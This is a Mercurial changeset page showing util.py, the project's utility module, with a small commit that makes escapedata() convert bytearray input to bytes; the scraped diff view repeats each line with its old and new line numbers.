util: teach escapedata() about bytearray...
Gregory Szorc
r36647:c98d1c67 default
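The change itself is small: escapedata() now coerces a bytearray argument to bytes before escaping. As an editor's illustration (not part of the commit), here is a minimal standalone sketch of why the coercion matters; the toy _ESCAPE_MAP and _ESCAPE_RE below stand in for the full DATA_ESCAPE_MAP and DATA_ESCAPE_RE tables defined in util.py. One failure mode without the bytes() call, at least in current CPython 3: a bytes-pattern match against a bytearray yields bytearray group slices, which are unhashable and so cannot be looked up in the escape dict.

# Editor's sketch, not part of the commit. Toy stand-ins for util.py's tables:
import re

_ESCAPE_MAP = {b'\n': br'\n'}      # util.py maps all 256 byte values
_ESCAPE_RE = re.compile(br'[\n]')  # util.py matches all non-printable bytes

def _escapedata(s):
    # Mirrors the patched function's shape: bytearray slices are unhashable,
    # so the map lookup below would raise TypeError without this coercion.
    if isinstance(s, bytearray):
        s = bytes(s)
    return _ESCAPE_RE.sub(lambda m: _ESCAPE_MAP[m.group(0)], s)

print(_escapedata(bytearray(b'a\nb')))  # -> b'a\\nb'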
@@ -1,4042 +1,4045 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import codecs
import collections
import contextlib
import errno
import gc
import hashlib
import imp
import io
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import signal
import socket
import stat
import string
import subprocess
import sys
import tempfile
import textwrap
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import dateutil

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

def isatty(fp):
    try:
        return fp.isatty()
    except AttributeError:
        return False

# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

if pycompat.iswindows:
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
shellsplit = platform.shellsplit
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass

# Python compatibility

_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)

def safehasattr(thing, attr):
    return getattr(thing, attr, _notset) is not _notset

def _rapply(f, xs):
    if xs is None:
        # assume None means non-value of optional data
        return xs
    if isinstance(xs, (list, set, tuple)):
        return type(xs)(_rapply(f, x) for x in xs)
    if isinstance(xs, dict):
        return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
    return f(xs)

def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)

def bytesinput(fin, fout, *args, **kwargs):
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = sin, sout

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise Abort(_('unknown digest type: %s') % k)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

closefds = pycompat.isposix

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

def popen2(cmd, env=None, newlines=False):
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout

def popen3(cmd, env=None, newlines=False):
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr

def popen4(cmd, env=None, newlines=False, bufsize=-1):
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p

class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')

def escapedata(s):
    if isinstance(s, bytearray):
        s = bytes(s)

    return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)

707 class fileobjectobserver(object):
710 class fileobjectobserver(object):
708 """Logs file object activity."""
711 """Logs file object activity."""
709 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
710 self.fh = fh
713 self.fh = fh
711 self.name = name
714 self.name = name
712 self.logdata = logdata
715 self.logdata = logdata
713 self.reads = reads
716 self.reads = reads
714 self.writes = writes
717 self.writes = writes
715
718
716 def _writedata(self, data):
719 def _writedata(self, data):
717 if not self.logdata:
720 if not self.logdata:
718 self.fh.write('\n')
721 self.fh.write('\n')
719 return
722 return
720
723
721 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
722 if b'\n' not in data:
725 if b'\n' not in data:
723 self.fh.write(': %s\n' % escapedata(data))
726 self.fh.write(': %s\n' % escapedata(data))
724 return
727 return
725
728
726 # Data with newlines is written to multiple lines.
729 # Data with newlines is written to multiple lines.
727 self.fh.write(':\n')
730 self.fh.write(':\n')
728 lines = data.splitlines(True)
731 lines = data.splitlines(True)
729 for line in lines:
732 for line in lines:
730 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
731
734
732 def read(self, res, size=-1):
735 def read(self, res, size=-1):
733 if not self.reads:
736 if not self.reads:
734 return
737 return
735 # Python 3 can return None from reads at EOF instead of empty strings.
738 # Python 3 can return None from reads at EOF instead of empty strings.
736 if res is None:
739 if res is None:
737 res = ''
740 res = ''
738
741
739 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
740 self._writedata(res)
743 self._writedata(res)
741
744
742 def readline(self, res, limit=-1):
745 def readline(self, res, limit=-1):
743 if not self.reads:
746 if not self.reads:
744 return
747 return
745
748
746 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
747 self._writedata(res)
750 self._writedata(res)
748
751
749 def write(self, res, data):
752 def write(self, res, data):
750 if not self.writes:
753 if not self.writes:
751 return
754 return
752
755
753 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
756 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
754 self._writedata(data)
757 self._writedata(data)
755
758
756 def flush(self, res):
759 def flush(self, res):
757 if not self.writes:
760 if not self.writes:
758 return
761 return
759
762
760 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
763 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
761
764
762 # For observedbufferedinputpipe.
765 # For observedbufferedinputpipe.
763 def bufferedread(self, res, size):
766 def bufferedread(self, res, size):
764 self.fh.write('%s> bufferedread(%d) -> %d' % (
767 self.fh.write('%s> bufferedread(%d) -> %d' % (
765 self.name, size, len(res)))
768 self.name, size, len(res)))
766 self._writedata(res)
769 self._writedata(res)
767
770
768 def bufferedreadline(self, res):
771 def bufferedreadline(self, res):
769 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
772 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
770 self._writedata(res)
773 self._writedata(res)
771
774
772 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
775 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
773 logdata=False):
776 logdata=False):
774 """Turn a file object into a logging file object."""
777 """Turn a file object into a logging file object."""
775
778
776 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
779 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
777 logdata=logdata)
780 logdata=logdata)
778 return fileobjectproxy(fh, observer)
781 return fileobjectproxy(fh, observer)
779
782
780 def version():
783 def version():
781 """Return version information if available."""
784 """Return version information if available."""
782 try:
785 try:
783 from . import __version__
786 from . import __version__
784 return __version__.version
787 return __version__.version
785 except ImportError:
788 except ImportError:
786 return 'unknown'
789 return 'unknown'
787
790
788 def versiontuple(v=None, n=4):
791 def versiontuple(v=None, n=4):
789 """Parses a Mercurial version string into an N-tuple.
792 """Parses a Mercurial version string into an N-tuple.
790
793
791 The version string to be parsed is specified with the ``v`` argument.
794 The version string to be parsed is specified with the ``v`` argument.
792 If it isn't defined, the current Mercurial version string will be parsed.
795 If it isn't defined, the current Mercurial version string will be parsed.
793
796
794 ``n`` can be 2, 3, or 4. Here is how some version strings map to
797 ``n`` can be 2, 3, or 4. Here is how some version strings map to
795 returned values:
798 returned values:
796
799
797 >>> v = b'3.6.1+190-df9b73d2d444'
800 >>> v = b'3.6.1+190-df9b73d2d444'
798 >>> versiontuple(v, 2)
801 >>> versiontuple(v, 2)
799 (3, 6)
802 (3, 6)
800 >>> versiontuple(v, 3)
803 >>> versiontuple(v, 3)
801 (3, 6, 1)
804 (3, 6, 1)
802 >>> versiontuple(v, 4)
805 >>> versiontuple(v, 4)
803 (3, 6, 1, '190-df9b73d2d444')
806 (3, 6, 1, '190-df9b73d2d444')
804
807
805 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
808 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
806 (3, 6, 1, '190-df9b73d2d444+20151118')
809 (3, 6, 1, '190-df9b73d2d444+20151118')
807
810
808 >>> v = b'3.6'
811 >>> v = b'3.6'
809 >>> versiontuple(v, 2)
812 >>> versiontuple(v, 2)
810 (3, 6)
813 (3, 6)
811 >>> versiontuple(v, 3)
814 >>> versiontuple(v, 3)
812 (3, 6, None)
815 (3, 6, None)
813 >>> versiontuple(v, 4)
816 >>> versiontuple(v, 4)
814 (3, 6, None, None)
817 (3, 6, None, None)
815
818
816 >>> v = b'3.9-rc'
819 >>> v = b'3.9-rc'
817 >>> versiontuple(v, 2)
820 >>> versiontuple(v, 2)
818 (3, 9)
821 (3, 9)
819 >>> versiontuple(v, 3)
822 >>> versiontuple(v, 3)
820 (3, 9, None)
823 (3, 9, None)
821 >>> versiontuple(v, 4)
824 >>> versiontuple(v, 4)
822 (3, 9, None, 'rc')
825 (3, 9, None, 'rc')
823
826
824 >>> v = b'3.9-rc+2-02a8fea4289b'
827 >>> v = b'3.9-rc+2-02a8fea4289b'
825 >>> versiontuple(v, 2)
828 >>> versiontuple(v, 2)
826 (3, 9)
829 (3, 9)
827 >>> versiontuple(v, 3)
830 >>> versiontuple(v, 3)
828 (3, 9, None)
831 (3, 9, None)
829 >>> versiontuple(v, 4)
832 >>> versiontuple(v, 4)
830 (3, 9, None, 'rc+2-02a8fea4289b')
833 (3, 9, None, 'rc+2-02a8fea4289b')
831 """
834 """
832 if not v:
835 if not v:
833 v = version()
836 v = version()
834 parts = remod.split('[\+-]', v, 1)
837 parts = remod.split('[\+-]', v, 1)
835 if len(parts) == 1:
838 if len(parts) == 1:
836 vparts, extra = parts[0], None
839 vparts, extra = parts[0], None
837 else:
840 else:
838 vparts, extra = parts
841 vparts, extra = parts
839
842
840 vints = []
843 vints = []
841 for i in vparts.split('.'):
844 for i in vparts.split('.'):
842 try:
845 try:
843 vints.append(int(i))
846 vints.append(int(i))
844 except ValueError:
847 except ValueError:
845 break
848 break
846 # (3, 6) -> (3, 6, None)
849 # (3, 6) -> (3, 6, None)
847 while len(vints) < 3:
850 while len(vints) < 3:
848 vints.append(None)
851 vints.append(None)
849
852
850 if n == 2:
853 if n == 2:
851 return (vints[0], vints[1])
854 return (vints[0], vints[1])
852 if n == 3:
855 if n == 3:
853 return (vints[0], vints[1], vints[2])
856 return (vints[0], vints[1], vints[2])
854 if n == 4:
857 if n == 4:
855 return (vints[0], vints[1], vints[2], extra)
858 return (vints[0], vints[1], vints[2], extra)
856
859
857 def cachefunc(func):
860 def cachefunc(func):
858 '''cache the result of function calls'''
861 '''cache the result of function calls'''
859 # XXX doesn't handle keywords args
862 # XXX doesn't handle keywords args
860 if func.__code__.co_argcount == 0:
863 if func.__code__.co_argcount == 0:
861 cache = []
864 cache = []
862 def f():
865 def f():
863 if len(cache) == 0:
866 if len(cache) == 0:
864 cache.append(func())
867 cache.append(func())
865 return cache[0]
868 return cache[0]
866 return f
869 return f
867 cache = {}
870 cache = {}
868 if func.__code__.co_argcount == 1:
871 if func.__code__.co_argcount == 1:
869 # we gain a small amount of time because
872 # we gain a small amount of time because
870 # we don't need to pack/unpack the list
873 # we don't need to pack/unpack the list
871 def f(arg):
874 def f(arg):
872 if arg not in cache:
875 if arg not in cache:
873 cache[arg] = func(arg)
876 cache[arg] = func(arg)
874 return cache[arg]
877 return cache[arg]
875 else:
878 else:
876 def f(*args):
879 def f(*args):
877 if args not in cache:
880 if args not in cache:
878 cache[args] = func(*args)
881 cache[args] = func(*args)
879 return cache[args]
882 return cache[args]
880
883
881 return f
884 return f
882
885
883 class cow(object):
886 class cow(object):
884 """helper class to make copy-on-write easier
887 """helper class to make copy-on-write easier
885
888
886 Call preparewrite before doing any writes.
889 Call preparewrite before doing any writes.
887 """
890 """
888
891
889 def preparewrite(self):
892 def preparewrite(self):
890 """call this before writes, return self or a copied new object"""
893 """call this before writes, return self or a copied new object"""
891 if getattr(self, '_copied', 0):
894 if getattr(self, '_copied', 0):
892 self._copied -= 1
895 self._copied -= 1
893 return self.__class__(self)
896 return self.__class__(self)
894 return self
897 return self
895
898
896 def copy(self):
899 def copy(self):
897 """always do a cheap copy"""
900 """always do a cheap copy"""
898 self._copied = getattr(self, '_copied', 0) + 1
901 self._copied = getattr(self, '_copied', 0) + 1
899 return self
902 return self
900
903
901 class sortdict(collections.OrderedDict):
904 class sortdict(collections.OrderedDict):
902 '''a simple sorted dictionary
905 '''a simple sorted dictionary
903
906
904 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
907 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
905 >>> d2 = d1.copy()
908 >>> d2 = d1.copy()
906 >>> d2
909 >>> d2
907 sortdict([('a', 0), ('b', 1)])
910 sortdict([('a', 0), ('b', 1)])
908 >>> d2.update([(b'a', 2)])
911 >>> d2.update([(b'a', 2)])
909 >>> list(d2.keys()) # should still be in last-set order
912 >>> list(d2.keys()) # should still be in last-set order
910 ['b', 'a']
913 ['b', 'a']
911 '''
914 '''
912
915
913 def __setitem__(self, key, value):
916 def __setitem__(self, key, value):
914 if key in self:
917 if key in self:
915 del self[key]
918 del self[key]
916 super(sortdict, self).__setitem__(key, value)
919 super(sortdict, self).__setitem__(key, value)
917
920
918 if pycompat.ispypy:
921 if pycompat.ispypy:
919 # __setitem__() isn't called as of PyPy 5.8.0
922 # __setitem__() isn't called as of PyPy 5.8.0
920 def update(self, src):
923 def update(self, src):
921 if isinstance(src, dict):
924 if isinstance(src, dict):
922 src = src.iteritems()
925 src = src.iteritems()
923 for k, v in src:
926 for k, v in src:
924 self[k] = v
927 self[k] = v
925
928
926 class cowdict(cow, dict):
929 class cowdict(cow, dict):
927 """copy-on-write dict
930 """copy-on-write dict
928
931
929 Be sure to call d = d.preparewrite() before writing to d.
932 Be sure to call d = d.preparewrite() before writing to d.
930
933
931 >>> a = cowdict()
934 >>> a = cowdict()
932 >>> a is a.preparewrite()
935 >>> a is a.preparewrite()
933 True
936 True
934 >>> b = a.copy()
937 >>> b = a.copy()
935 >>> b is a
938 >>> b is a
936 True
939 True
937 >>> c = b.copy()
940 >>> c = b.copy()
938 >>> c is a
941 >>> c is a
939 True
942 True
940 >>> a = a.preparewrite()
943 >>> a = a.preparewrite()
941 >>> b is a
944 >>> b is a
942 False
945 False
943 >>> a is a.preparewrite()
946 >>> a is a.preparewrite()
944 True
947 True
945 >>> c = c.preparewrite()
948 >>> c = c.preparewrite()
946 >>> b is c
949 >>> b is c
947 False
950 False
948 >>> b is b.preparewrite()
951 >>> b is b.preparewrite()
949 True
952 True
950 """
953 """
951
954
952 class cowsortdict(cow, sortdict):
955 class cowsortdict(cow, sortdict):
